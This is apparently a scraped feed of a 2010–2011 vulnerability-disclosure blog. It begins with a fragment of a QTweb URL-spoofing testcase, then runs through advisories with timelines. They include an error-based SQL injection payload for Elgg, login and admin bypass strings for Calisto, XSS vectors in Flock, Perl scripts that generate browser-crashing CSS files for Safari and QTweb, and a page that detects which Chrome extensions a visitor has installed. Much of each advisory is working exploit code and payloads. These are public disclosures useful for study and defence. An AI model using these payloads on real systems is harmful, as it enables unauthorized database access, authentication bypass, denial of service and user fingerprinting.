iGEhfC1OllXDbN0gnWnxC+YPkND/sVWCMDslylYNSUtBT2svKVZkCmjGPd01cO2NS15MTwVWVLXxAmZ+7dVBQ+MmTuXz1mJmABFtY0JWYQxmSCSOY0M2Jr9mEYg+AYxZBWXucD9maM6Gc3FueDNl/LoF+HFmE/IyxhRuRPOzZ2juEQHViMzmgN/l9o/rNee+B0HjU/5mDl1WPnneiG9mBHxl8OJo1lvl9dQ9QbcmYzGsVQIvZb/MXXWwthF7ZU89DUNo5kA9ZhWFbkj3bfgDWcgF410y1R4K2y321pI+bo6Z1kc5bewd1q03ToArbjvxvriylrlM6SKN5lpqHj/DhrF1XruJbruabrurbru8brvNbrvebrvvbrvwbswBbswQ0m7MI27MNG7MQOvIAAADs='/&gt;");<br /> }<br /> &nbsp; &lt;/script&gt;<br /> &lt;/head&gt;<br /> &lt;body&gt;<br /> &lt;h1&gt;QTweb 3.7.2 and 3.7.3 (buils 087) document.open() URL weakness Spoof testcase by Lostmon&lt;/h1&gt;<br /> &lt;noscript&gt;&lt;p&gt;this testcase requires JavaScript to run.&lt;/p&gt;&lt;/noscript&gt;<br /> &lt;p&gt;First Click in this link ==&gt; &lt;a href=":#:" onClick="invokePoC();" target="_blank"&gt;invoke PoC&lt;/a&gt;&lt;/p&gt;<br /> &lt;p&gt;and Look in result window, the address bar , don't show The url <br /> and if you write any url in the address bar, the browser do not navigate to it.<br /> This issue can be used to spoof sites or pishing attacks.<br /> Safari 5.1 (7534.50)<br /> &lt;/body&gt;<br /> &lt;/html&gt;<br /> <br /> ################<br /> Solution<br /> ###############<br /> <br /> No solution at this time !!!<br /> <br /> ###############<br /> Timeline<br /> ###############<br /> <br /> Discovered :Mar 30, 2011<br /> Vendor Notify: Sep 28, 2011<br /> Vendor response: XXXXX<br /> Vendor Patch: XXXXXX<br /> Public Disclosure: Oct 03, 2011<br /> <br /> ########################## €nd ########################<br /> <br /> Atentamente:<br /> Lostmon (lostmon@gmail.com)<br /> Web-Blog: http://lostmon.blogspot.com/<br /> Google group: http://groups.google.com/group/lostmon (new)<br /> --<br /> La curiosidad es lo que hace mover la mente.... <div class="blogger-post-footer">Lostmon (lostmon@gmail.com) Web-Blog: http://lostmon.blogspot.com/ Google group: http://groups.google.com/group/lostmon (new) -- La curiosidad es lo que hace mover la mente....<img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9011578-5419473408700392747?l=lostmon.blogspot.com' alt='' /></div> <p><a href="http://feedads.g.doubleclick.net/~a/PHkv0nNiR_giLT8YD2nyVn1AjOc/0/da"><img src="http://feedads.g.doubleclick.net/~a/PHkv0nNiR_giLT8YD2nyVn1AjOc/0/di" border="0" ismap="true"></img></a><br/> <a href="http://feedads.g.doubleclick.net/~a/PHkv0nNiR_giLT8YD2nyVn1AjOc/1/da"><img src="http://feedads.g.doubleclick.net/~a/PHkv0nNiR_giLT8YD2nyVn1AjOc/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/LostmonBlogger/~4/gUohxJFHMx0" height="1" width="1"/>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comhttp://lostmon.blogspot.com/2011/10/qtweb-internet-browser-url-weakness.htmltag:blogger.com,1999:blog-9011578.post-81688359255955351022011-08-15T21:28:00.001+02:002011-08-15T21:30:42.809+02:002011-08-15T21:30:42.809+02:00##################################################<br /> Elgg 1.8 beta2 and prior to 1.7.11 'container_guid' and 'owner_guid' SQL Injection<br /> Vendor URL: http://www.elgg.org/<br /> Advisore: http://lostmon.blogspot.com/2011/08/elgg-18-beta2-and-prior-to-1711.html<br /> Vendor notify: YES exploit available: YES<br /> ##################################################<br /> <br /> ###################<br /> Description By vendor<br /> ###################<br /> <br /> Elgg is an award-winning social networking engine, delivering<br /> the building blocks that enable businesses, schools, universities<br /> and associations to create their own fully-featured social networks<br /> and applications. Organizations with networks powered by Elgg<br /> include: Australian Government, British Government, Federal Canadian<br /> Government, MITRE, The World Bank, UNESCO, NASA, Stanford University,<br /> Johns Hopkins University and more (http://elgg.org/powering.php)<br /> <br /> <br /> ######################<br /> Vulnerability Description<br /> ######################<br /> <br /> Elgg contains a flaw that may allow an attacker to carry out an<br /> SQL injection attack. The issue is due to the script not properly<br /> sanitizing user-supplied input to 'container_guid' and 'owner_guid'<br /> variables upon submision to 'mod/search/pages/search/index.php' <br /> This may allow an attacker to inject or manipulate SQL queries<br /> in the backend database.<br /> <br /> ################<br /> Versions afected<br /> ################<br /> <br /> Elgg 1.8 beta2 vulnerable <br /> Elgg 1.7.10 and prior versions vulnerables<br /> Elgg 1.7.11 not vulnerable<br /> <br /> #################<br /> Tecnical details<br /> #################<br /> <br /> Injection type is Integer and it only can be exploit via<br /> Mysql error based injection method, it works with<br /> 'magic_quotes_gpc' set to 'on' or 'off'<br /> <br /> <br /> ######################<br /> Proof Of Concept<br /> ######################<br /> <br /> If you know what is error based injection... you know how to use it ;)<br /> <br /> URL => http://localhost/elgg/search/?q=someword&search_type=tags&container_guid=7826'<br /> <br /> Injections:<br /> <br /> and(select 1 from(select count(*),concat((select (select %column_name%) from<br /> `information_schema`.tables limit 0,1),floor(rand(0)*2))x from<br /> `information_schema`.tables<br /> group by x)a) and 1=1<br /> <br /> Count(table_name) of information_schema.tables where<br /> table_schema=0x74657374 is 75<br /> <br /> Count(column_name) of information_schema.columns where<br /> table_schema=0x74657374 and table_name=0x62616E6C697374 is 4<br /> <br /> ################<br /> Solution<br /> ###############<br /> <br /> The vendor has release a updated version to solve this <br /> issue and others see changelog and update your Elgg <br /> instalation to 1.7.11<br /> <br /> <br /> ###############<br /> Timeline<br /> ###############<br /> <br /> Discovered :July 30, 2011<br /> Vendor Notify:July 30, 2011<br /> Vendor response:July 30, 2011<br /> Vendor Patch: August 15, 2011<br /> Public Disclosure: August 15, 2011<br /> <br /> ########################## €nd ########################<br /> <br /> Atentamente:<br /> Lostmon (lostmon@gmail.com)<br /> Web-Blog: http://lostmon.blogspot.com/<br /> Google group: http://groups.google.com/group/lostmon (new)<br /> --<br /> La curiosidad es lo que hace mover la mente.... <div class="blogger-post-footer">Lostmon (lostmon@gmail.com) Web-Blog: http://lostmon.blogspot.com/ Google group: http://groups.google.com/group/lostmon (new) -- La curiosidad es lo que hace mover la mente....<img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9011578-8168835925595535102?l=lostmon.blogspot.com' alt='' /></div> <p><a href="http://feedads.g.doubleclick.net/~a/dTSFx_Y3BRcmtWaYW6DHiRjoWK0/0/da"><img src="http://feedads.g.doubleclick.net/~a/dTSFx_Y3BRcmtWaYW6DHiRjoWK0/0/di" border="0" ismap="true"></img></a><br/> <a href="http://feedads.g.doubleclick.net/~a/dTSFx_Y3BRcmtWaYW6DHiRjoWK0/1/da"><img src="http://feedads.g.doubleclick.net/~a/dTSFx_Y3BRcmtWaYW6DHiRjoWK0/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/LostmonBlogger/~4/G27j5oA-Iec" height="1" width="1"/>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comhttp://lostmon.blogspot.com/2011/08/elgg-18-beta2-and-prior-to-1711.htmltag:blogger.com,1999:blog-9011578.post-11612733854055088962011-08-11T23:09:00.004+02:002011-08-14T13:04:33.809+02:002011-08-14T13:04:33.809+02:00##################################################<br /> Calisto light, light plus and full, Sql Injection And user or Admin bypass<br /> Vendor URL: http://www.calistosoft.com.ar/<br /> Advisore: http://lostmon.blogspot.com/2011/08/calisto-light-light-plus-and-full-sql.html<br /> Vendor notify: YES exploit available: YES<br /> ##################################################<br /> <br /> <br /> ##########################<br /> Vulnerability Description<br /> ##########################<br /> <br /> Calisto Light, Light Plus and Full contains a flaw that may <br /> allow an attacker to carry out an SQL injection attack. The<br /> issue is due to the script not properly sanitizing user-supplied<br /> input to 'usuario' form field and "txtEmail' param upon submision<br /> to 'login.aspx' and '/admin/loginAdmin.aspx' This may allow an <br /> attacker to inject or manipulate SQL queries in the backend database.<br /> #################<br /> UPDATE 14/08/2011<br /> #################<br /> <br /> Detalle.aspx, Oferta.aspx, Categoria.aspx, contacto.aspx, <br /> marca.aspx, novedades.aspx, empresa.aspx FAQ.aspx and Registracion.aspx<br /> are afected by this flaw too.<br /> <br /> ################<br /> Versions afected<br /> ################<br /> <br /> Calisto Light<br /> Calisto Light plus<br /> Calisto Full<br /> <br /> ######################<br /> Proof Of Concept<br /> ######################<br /> <br /> this issue can be used to bypass admin validation or user validation <br /> <br /> 1- If an attacker writes in 'Usuario' box:<br /> <br /> someword'or'1'='1'<br /> and click in login button. wen the aplication post to 'login.aspx' <br /> it shows a nice SQL warning but if write:<br /> <br /> someword'or'1'='1'--<br /> <br /> it bypass validation. if anyones know a user email, then he can <br /> log as this user :) <br /> <br /> 2- If an attacker writes in 'usuario' box from admin section:<br /> <br /> Admin'or'1'='1'--<br /> <br /> And click in login button wen the aplication post to<br /> '/admin/loginAdmin.aspx' it bypass Admin validation. :)<br /> <br /> <br /> ################<br /> Solution<br /> ###############<br /> <br /> No solution was available at this time.<br /> I have send four emails to calistosoft via his webform<br /> and info and support mails to get initial contact but <br /> they haven't respond :(<br /> <br /> ###############<br /> Timeline<br /> ###############<br /> <br /> Discovered : 30-07-2011<br /> Vendor Notify: 7-08-2011<br /> Vendor response: no response.<br /> Workarround patch: no patch<br /> Vendor Patch: no patch<br /> Public Disclosure: 11-08-2011<br /> <br /> ########################## €nd ########################<br /> <br /> Atentamente:<br /> Lostmon (lostmon@gmail.com)<br /> Web-Blog: http://lostmon.blogspot.com/<br /> Google group: http://groups.google.com/group/lostmon (new)<br /> --<br /> La curiosidad es lo que hace mover la mente.... <div class="blogger-post-footer">Lostmon (lostmon@gmail.com) Web-Blog: http://lostmon.blogspot.com/ Google group: http://groups.google.com/group/lostmon (new) -- La curiosidad es lo que hace mover la mente....<img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9011578-1161273385405508896?l=lostmon.blogspot.com' alt='' /></div> <p><a href="http://feedads.g.doubleclick.net/~a/87PKXY_pP3pQ2kTes-4gIYTo5g8/0/da"><img src="http://feedads.g.doubleclick.net/~a/87PKXY_pP3pQ2kTes-4gIYTo5g8/0/di" border="0" ismap="true"></img></a><br/> <a href="http://feedads.g.doubleclick.net/~a/87PKXY_pP3pQ2kTes-4gIYTo5g8/1/da"><img src="http://feedads.g.doubleclick.net/~a/87PKXY_pP3pQ2kTes-4gIYTo5g8/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/LostmonBlogger/~4/YMzvVWkFdKo" height="1" width="1"/>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comhttp://lostmon.blogspot.com/2011/08/calisto-light-light-plus-and-full-sql.htmltag:blogger.com,1999:blog-9011578.post-77284822533405503852011-08-09T20:55:00.003+02:002011-08-09T21:30:19.272+02:002011-08-09T21:30:19.272+02:00#############################################<br /> Internet Explorer 6, 7 and 8 Window.open race condition Vulnerability<br /> Vendor URL: http://www.microsoft.com<br /> Advisore: http://lostmon.blogspot.com/2011/08/internet-explorer-6-7-and-8-windowopen.html<br /> Coordinate Dislcosure: YES exploit available: Private<br /> CVE-2011-1257 and MS011-57<br /> #############################################<br /> <br /> Microsoft Internet Explorer 6, 7 and 8 is prone vulnerable to a<br /> Remote code execution due a race condition in window.open<br /> javascript metod<br /> <br /> A Remote attacker can compose a web page with malicious code<br /> and wen a victim visit this malformed web doc, attacker can<br /> exploit this situation.<br /> <br /> <br /> ######################<br /> Solution<br /> ######################<br /> <br /> Microsoft has issue a bulletin class with tecnical detalis about this issue<br /> with this identifier [MS011-57]<br /> <br /> you can found more detailed at this link:<br /> http://www.microsoft.com/technet/security/bulletin/MS11-057.mspx<br /> <br /> Also microsoft has issue a patch to solve this vulnerability<br /> see http://www.microsoft.com/technet/security/bulletin/MS11-057.mspx<br /> for update your system.<br /> <br /> ############<br /> Timeline<br /> ############<br /> <br /> Discovered : January 13, 2011<br /> Vendor Notify: January 19, 2011<br /> Vendor Response: January 19, 2011<br /> Vendor Patch: August 9, 2011<br /> Public Disclosure: August 9, 2011<br /> <br /> ################# €nd #########################<br /> <br /> Thnx to Michal Zalewski for his extraordinary mind<br /> and knowledge, people like him should have a virtual<br /> statue for the rest of the times<br /> <br /> Thnx To Jack, Gerardo, Nate and all MSRC<br /> for his support in this issue.<br /> <br /> Thnx To Microsoft Vulnerability Research (MSVR)<br /> for interesting in this issue and for coordinate<br /> Disclosure in other browsers afected.<br /> <br /> Thnx to All who Belive in Me include you Estrella :**<br /> <br /> atentamente:<br /> Lostmon (lostmon@gmail.com)<br /> Web-Blog: http://lostmon.blogspot.com/<br /> Google group: http://groups.google.com/group/lostmon (new)<br /> --<br /> La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com) Web-Blog: http://lostmon.blogspot.com/ Google group: http://groups.google.com/group/lostmon (new) -- La curiosidad es lo que hace mover la mente....<img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9011578-7728482253340550385?l=lostmon.blogspot.com' alt='' /></div> <p><a href="http://feedads.g.doubleclick.net/~a/wrzQyPXLxmLj59gzbXE9I_GzfTc/0/da"><img src="http://feedads.g.doubleclick.net/~a/wrzQyPXLxmLj59gzbXE9I_GzfTc/0/di" border="0" ismap="true"></img></a><br/> <a href="http://feedads.g.doubleclick.net/~a/wrzQyPXLxmLj59gzbXE9I_GzfTc/1/da"><img src="http://feedads.g.doubleclick.net/~a/wrzQyPXLxmLj59gzbXE9I_GzfTc/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/LostmonBlogger/~4/MlaF-88dIaM" height="1" width="1"/>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comhttp://lostmon.blogspot.com/2011/08/internet-explorer-6-7-and-8-windowopen.htmltag:blogger.com,1999:blog-9011578.post-50290692770803760972011-03-11T23:35:00.001+01:002011-03-11T23:35:34.985+01:002011-03-11T23:35:34.985+01:00#########################################<br /> Multiple vulnerabilities in Flock Browser 3.0.0.3989<br /> Vendor URL: http://beta.flock.com/<br /> Vendor Advisores: http://www.flock.com/security/ <br /> Advisore:http://lostmon.blogspot.com/2011/03/multiple-vulnerabilities-in-flock.html<br /> Vendor notify:YES exploits availables:YES<br /> ######################################### <br /> <br /> Some stuff that i don't have published before , because i don't have time , i'm studing and i need time to read books and study.<br /> <br /> Flock is faster, simpler, and more friendly. Literally. It's the only sleek, modern web browser with the built-in ability to keep you up-to-date with your Facebook and Twitter friends. This browser version (3.0.0.3989) is based in a old chromium project (5.0.375.75) and has multiple bugs imported from chrome and his owns bugs :)&nbsp; <br /> I have contributed in secure Flock browser, i have tested version with google chrome&nbsp; base. <br /> I have do a list with all issues that i found and Flock Team has release some advisores about it time after.<br /> <br /> ###############<br /> TODO LIST / Bugs<br /> ###############<br /> <ol><li>&nbsp;Inspector window attributes script injection chrome bug 31590</li> <li>&nbsp;XSS in search engine in chrome://history/ chrome bug 13760( not exploitable from remote attackers ) (chrome://history/#q="&gt;&lt;iframe src=javascript:alert(1)&gt;&amp;p=0) </li> <li>&nbsp;XSS in search box in favorites page ( chrome-extension://flock_people/favorites.html#p=1&amp;v=all&amp;o=0&amp;s=title)(not explotable from remote attackers) </li> <li>&nbsp;XSS in search engine extension when paste in url (chrome-extension://flock_people/search.html)( persistent xss)(not exploiable from remote attackers) </li> <li>&nbsp;XSS in social extension when try to login in facebook or twiter or youtube (not exploitable from remote attackers) </li> <li>&nbsp;XSS in rss vienwer in search box chrome-extension://flock_people/feed_viewer.html?http://path_to_rss ( not exploitable from remote attackers) </li> <li>&nbsp;XSS in rss viewner when render xml from remote host if the entry has html it is executed when view the news across flock rss viewner(exploitable via remote sites) (see for example my feed =&gt; chrome-extension://flock_people/feed_viewer.html?http://lostmon.blogspot.com/atom.xml) and them if you type in search box for example " or &lt; it executes again the xss stored in xml file :)&nbsp;</li> <li>window.open() Method Javascript Same-Origin Policy Violation chrome bug 30660&nbsp;&nbsp;</li> <li>url with a leading NULL byte can bypass cross origin protection Chrome bug 37383</li> </ol><br /> <br /> ###########################<br /> Advisores from Flock developers<br /> ###########################<br /> <b>FLOCK-SA-2010-04</b><br /> <br /> Title: window.open() Method Javascript Same-Origin Policy Violation (XSS)<br /> Impact: High<br /> Announced on: 2010-09-09<br /> Affected Products: Flock 3 versions prior to 3.0.0.4094<br /> CVEs (cve.mitre.org): CVE-2010-0661<br /> Details:<br /> WebCore/bindings/v8/custom/V8DOMWindowCustom.cpp in WebKit before r52401, as used in Google Chrome before 4.0.249.78, allows remote attackers to bypass the Same Origin Policy via vectors involving the window.open method.<br /> <br /> Credit to Tokuji Akamine, Senior Consultant at Symantec Consulting Services (for Chromium) and Lostmon Lords (for Flock).<br /> References: https://bugs.webkit.org/show_bug.cgi?id=32647<br /> http://code.google.com/p/chromium/issues/detail?id=30660<br /> <br /> <b>FLOCK-SA-2010-03</b><br /> <br /> Title: javascript: url with a leading NULL byte can bypass cross origin protection (XSS)<br /> Impact: High<br /> Announced on: 2010-09-09<br /> Affected Products: Flock 3 versions prior to 3.0.0.4112<br /> CVEs (cve.mitre.org): CVE-2010-1236<br /> <br /> Details: <br /> A javascript: url with a leading NULL byte can bypass cross origin protection,<br /> which has unspecified impact and remote attack vectors.<br /> <br /> Credit to kuzzcc (for Chromium) and Lostmon Lords (for Flock).<br /> References: https://bugs.webkit.org/show_bug.cgi?id=35948<br /> http://code.google.com/p/chromium/issues/detail?id=37383<br /> <br /> <b>FLOCK-SA-2010-02</b><br /> <br /> Title: A malicious RSS feed can bypass cross origin protection (XSS)<br /> Impact: High<br /> Announced on: 2010-09-09<br /> Affected Products: Flock 3 versions prior to 3.0.0.4114<br /> CVEs (cve.mitre.org): CVE-2010-3262<br /> <br /> Details: <br /> A malicious RSS feed containg HTML when viewed can bypass cross-origin protection,<br /> which has unspecified impact and remote attack vectors.<br /> Credit to Lostmon Lords.<br /> <br /> <b>FLOCK-SA-2010-01</b><br /> <br /> Title: A malformed favourite can bypass cross origin protection (XSS)<br /> Impact: Moderate<br /> Announced on: 2010-09-09<br /> Affected Products: Flock 3 versions prior to 3.0.0.4094<br /> CVEs (cve.mitre.org): CVE-2010-3202<br /> Details: <br /> A malformed favourite imported from an HTML file, imported from another browser,<br /> or manually created can bypass cross-origin protection, which has unspecified impact<br /> and attack vectors.<br /> Credit to Lostmon Lords.<br /> References: http://www.securityfocus.com/archive/1/513214<br /> ################################################<br /> <br /> Atentamente:<br /> Lostmon (lostmon@gmail.com)<br /> Web-Blog: http://lostmon.blogspot.com/<br /> Google group: http://groups.google.com/group/lostmon (new)<br /> --<br /> La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com) Web-Blog: http://lostmon.blogspot.com/ Google group: http://groups.google.com/group/lostmon (new) -- La curiosidad es lo que hace mover la mente....<img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9011578-5029069277080376097?l=lostmon.blogspot.com' alt='' /></div> <p><a href="http://feedads.g.doubleclick.net/~a/Ygi_9XGkSBY4H44knBBrzbhZj3k/0/da"><img src="http://feedads.g.doubleclick.net/~a/Ygi_9XGkSBY4H44knBBrzbhZj3k/0/di" border="0" ismap="true"></img></a><br/> <a href="http://feedads.g.doubleclick.net/~a/Ygi_9XGkSBY4H44knBBrzbhZj3k/1/da"><img src="http://feedads.g.doubleclick.net/~a/Ygi_9XGkSBY4H44knBBrzbhZj3k/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/LostmonBlogger/~4/j17wPtPXaL0" height="1" width="1"/>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comhttp://lostmon.blogspot.com/2011/03/multiple-vulnerabilities-in-flock.htmltag:blogger.com,1999:blog-9011578.post-67193764364557554622010-12-08T21:53:00.002+01:002010-12-09T22:27:17.182+01:002010-12-09T22:27:17.182+01:00#########################################################<br /> QTweb browser for windows 3.7(Build 063) CSS Denial of Service<br /> Vendor URL: http://www.qtweb.net/<br /> Advisore:http://lostmon.blogspot.com/2010/12/qtweb-browser-for-windows-37build-063.html<br /> Vendor notify: NO exploit available: YES<br /> ##########################################################<br /> <br /> QTweb browser for windows is prone vulnerable to a denial of service<br /> condition. An attacker can exploit this issue to cause the <br /> affected browser to crash, effectively denying service to <br /> legitimate users.<br /> <br /> The following are vulnerable:<br /> <br /> QTweb for windows 3.7(Build 063)<br /> <br /> <br /> ###########<br /> Sample PoC<br /> ###########<br /> <br /> Generate the Crash file and open it with QTweb browser,it hangs and arround one minut it crash with a anormal program termination.<br /> <br /> #########################################################################<br /> # Title: QTweb browser for windows 5.0.2(7533.18.5) CSS Denial of Service PoC <br /> # Developer: http://www.Apple.com <br /> # Tested: Windows 7 Ultimate 32-bit <br /> #########################################################################<br /> # <br /> #!/usr/bin/perl <br /> my $file= "Crash_QTweb.html"; <br /> my $junk= "A/" x 20000016; <br /> open($FILE,">$file"); <br /> print $FILE "&lt;html>\n&lt;head>\n&lt;style type='text/css'>\nbody {shitCSS: ".$junk."}\n&lt;/style>\n&lt;/head>\n&lt;/html>"; <br /> print "\nCrash_QTweb.html File Created successfully\n"; <br /> close($FILE);<br /> <br /> ############################# EOF ############################<br /> <br /> Atentamente:<br /> Lostmon (lostmon@gmail.com)<br /> Web-Blog: http://lostmon.blogspot.com/<br /> Google group: http://groups.google.com/group/lostmon (new)<br /> --<br /> La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com) Web-Blog: http://lostmon.blogspot.com/ Google group: http://groups.google.com/group/lostmon (new) -- La curiosidad es lo que hace mover la mente....<img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9011578-6719376436455755462?l=lostmon.blogspot.com' alt='' /></div> <p><a href="http://feedads.g.doubleclick.net/~a/Go9jC81qt1ISBzaVF49Ag1vDHXo/0/da"><img src="http://feedads.g.doubleclick.net/~a/Go9jC81qt1ISBzaVF49Ag1vDHXo/0/di" border="0" ismap="true"></img></a><br/> <a href="http://feedads.g.doubleclick.net/~a/Go9jC81qt1ISBzaVF49Ag1vDHXo/1/da"><img src="http://feedads.g.doubleclick.net/~a/Go9jC81qt1ISBzaVF49Ag1vDHXo/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/LostmonBlogger/~4/vfjfvKKar7A" height="1" width="1"/>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comhttp://lostmon.blogspot.com/2010/12/qtweb-browser-for-windows-37build-063.htmltag:blogger.com,1999:blog-9011578.post-74143214580006365292010-12-08T21:44:00.001+01:002010-12-08T21:45:36.734+01:002010-12-08T21:45:36.734+01:00#########################################################<br /> Safari for windows 5.0.2(7533.18.5) CSS Denial of Service<br /> Vendor URL:http://www.Apple.com<br /> Advisore:http://lostmon.blogspot.com/2010/12/safari-for-windows-5027533185-css.html<br /> Vendor notify: NO exploit available: YES<br /> ##########################################################<br /> <br /> Safari for windows is prone vulnerable to a denial of service<br /> condition. An attacker can exploit this issue to cause the <br /> affected browser to crash, effectively denying service to <br /> legitimate users.<br /> <br /> The following are vulnerable:<br /> <br /> safari for windows 5.0.2(7533.18.5)<br /> <br /> <br /> ###########<br /> Sample PoC<br /> ###########<br /> <br /> Generate the Crash file and open it with safari,it hangs and arround one minut it crash<br /> with a anormal program termination.<br /> <br /> #########################################################################<br /> # Title: safari for windows 5.0.2(7533.18.5) CSS Denial of Service PoC <br /> # Developer: http://www.Apple.com <br /> # Tested: Windows 7 Ultimate 32-bit <br /> #########################################################################<br /> # <br /> #!/usr/bin/perl <br /> my $file= "Crash_safari.html"; <br /> my $junk= "A/" x 20000000; <br /> open($FILE,">$file"); <br /> print $FILE "&lt;html>\n&lt;head>\n&lt;style type='text/css'>\nbody {shitCSS: ".$junk."}\n&lt;/style>\n&lt;/head>\n&lt;/html>"; <br /> print "\nCrash_safari.html File Created successfully\n"; <br /> close($FILE);<br /> <br /> ############################# EOF ############################<br /> <br /> Atentamente:<br /> Lostmon (lostmon@gmail.com)<br /> Web-Blog: http://lostmon.blogspot.com/<br /> Google group: http://groups.google.com/group/lostmon (new)<br /> --<br /> La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com) Web-Blog: http://lostmon.blogspot.com/ Google group: http://groups.google.com/group/lostmon (new) -- La curiosidad es lo que hace mover la mente....<img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9011578-7414321458000636529?l=lostmon.blogspot.com' alt='' /></div> <p><a href="http://feedads.g.doubleclick.net/~a/1jBvg_Py8AAC5TzYMQlKRlzdDM4/0/da"><img src="http://feedads.g.doubleclick.net/~a/1jBvg_Py8AAC5TzYMQlKRlzdDM4/0/di" border="0" ismap="true"></img></a><br/> <a href="http://feedads.g.doubleclick.net/~a/1jBvg_Py8AAC5TzYMQlKRlzdDM4/1/da"><img src="http://feedads.g.doubleclick.net/~a/1jBvg_Py8AAC5TzYMQlKRlzdDM4/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/LostmonBlogger/~4/M-EtmRmTe6s" height="1" width="1"/>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comhttp://lostmon.blogspot.com/2010/12/safari-for-windows-5027533185-css.htmltag:blogger.com,1999:blog-9011578.post-24065016144985177962010-09-07T14:20:00.003+02:002010-09-07T14:23:30.798+02:002010-09-07T14:23:30.798+02:00######################################################<br /> Google Chrome Instaled extensions arbitrary detection<br /> Vendor url: http://www.google.com<br /> Advisore:http://lostmon.blogspot.com/2010/09/google-chrome-instaled-extensions.html<br /> Vendor notify:YES vendor confirmed.YES exploit:YES<br /> ######################################################<br /> <br /> Change log :http://googlechromereleases.blogspot.com/2010/09/stable-and-beta-channel-updates.html<br /> <br /> #########<br /> Abstract<br /> #########<br /> <br /> How safe is use extensions ?<br /> a attacker can access via iframe to resource extensions ( at this moment i <br /> don´t have found a way to altered information from extensions).<br /> <br /> like <br /> &gt;iframe<br /> src="chrome-extension://gffjhibehnempbkeheiccaincokdjbfe/options.html"&lt;&gt;/iframe&lt;<br /> for example...<br /> <br /> a remote user can modify this web doc and call it with meta tag "base" <br /> in a malformed doc...<br /> <br /> &lt;BASE HREF="chrome-extension://gffjhibehnempbkeheiccaincokdjbfe/"&gt;<br /> so i thnik that chrome-extension need sanitizacion to don´t access internal<br /> resources from external web pages..( file:/// and other protocols handlers<br /> are safe to use and don´t give access to internal resources from external<br /> web docs...)<br /> <br /> So chrome-extension protocol handler can be used to get extensions instaled<br /> on client browser...and them if any extension is vulnerable to something<br /> this information can be used for exploit this extension...<br /> <br /> In incognito mode Extensions can be detectable too<br /> <br /> ###########################<br /> A sample PoC of detection <br /> ###########################<br /> <br /> &lt;html&gt;<br /> &lt;head&gt;<br /> &lt;title&gt;Chrome extensions detector PoC By Lostmon&lt;/title&gt;<br /> &lt;body&gt;<br /> &lt;p&gt;&lt;img src="chrome-extension://gffjhibehnempbkeheiccaincokdjbfe/icon_128.png"<br /> onLoad="document.write('&lt;br /&gt;&lt;b&gt;you have instaled Gmail checker<br /> plus&lt;/b&gt;');" onError="document.write('&lt;br /&gt;&lt;b&gt;File not found&lt;/b&gt;');"&gt;&lt;/p&gt;<br /> &lt;p&gt;&lt;img src="chrome-extension://bfbameneiokkgbdmiekhjnmfkcnldhhm/icons/16.png"<br /> onLoad="document.write('&lt;br /&gt;&lt;b&gt;you have instaled Web Developer&lt;/b&gt;');"<br /> onError="document.write('&lt;br /&gt;&lt;b&gt;File not found&lt;/b&gt;');"&gt;&lt;/p&gt;<br /> &lt;p&gt;&lt;img<br /> src="chrome-extension://bjcpobipejlbogodeiendpdgcdambjgo/icons/icon-lightning-16.png"<br /> onLoad="document.write('&lt;br /&gt;&lt;b&gt;you have instaled My Shortcuts&lt;/b&gt;');"<br /> onError="document.write('&lt;br /&gt;&lt;b&gt;File not found&lt;/b&gt;');"&gt;&lt;/p&gt;<br /> &lt;p&gt;&lt;img src="chrome-extension://bmagokdooijbeehmkpknfglimnifench/firebug.jpg"<br /> onLoad="document.write('&lt;br /&gt;&lt;b&gt;you have instaled Firebug&lt;/b&gt;');"<br /> onError="document.write('&lt;br /&gt;&lt;b&gt;File not found&lt;/b&gt;');"&gt;&lt;/p&gt;<br /> &lt;p&gt;&lt;img<br /> src="chrome-extension://ckibcdccnfeookdmbahgiakhnjcddpki/images/browseraction.png"<br /> onLoad="document.write('&lt;br /&gt;&lt;b&gt;you have instaled Webpage<br /> Screenshot&lt;/b&gt;');" onError="document.write('&lt;br /&gt;&lt;b&gt;File not<br /> found&lt;/b&gt;');"&gt;&lt;/p&gt;<br /> &lt;p&gt;&lt;img<br /> src="chrome-extension://dgpdioedihjhncjafcpgbbjdpbbkikmi/images/empty_preview.png"<br /> onLoad="document.write('&lt;br /&gt;&lt;b&gt;you have instaled Speed dial&lt;/b&gt;');"<br /> onError="document.write('&lt;br /&gt;&lt;b&gt;File not found&lt;/b&gt;');"&gt;&lt;/p&gt;<br /> &lt;p&gt;&lt;img<br /> src="chrome-extension://jfchnphgogjhineanplmfkofljiagjfb/icon_16_16.png"<br /> onLoad="document.write('&lt;br /&gt;&lt;b&gt;you have instaled Downloads&lt;/b&gt;');"<br /> onError="document.write('&lt;br /&gt;&lt;b&gt;File not found&lt;/b&gt;');"&gt;&lt;/p&gt;<br /> &lt;/body&gt;<br /> &lt;/html&gt;<br /> <br /> ####################EOF##########################<br /> <br /> ##############<br /> Timeline<br /> ##############<br /> <br /> Discovered:27 may 2010<br /> Vendor notify:01 jun 2010<br /> Vendor patch:02 sep 2010<br /> disclosure: 07 sep 2010<br /> <br /> 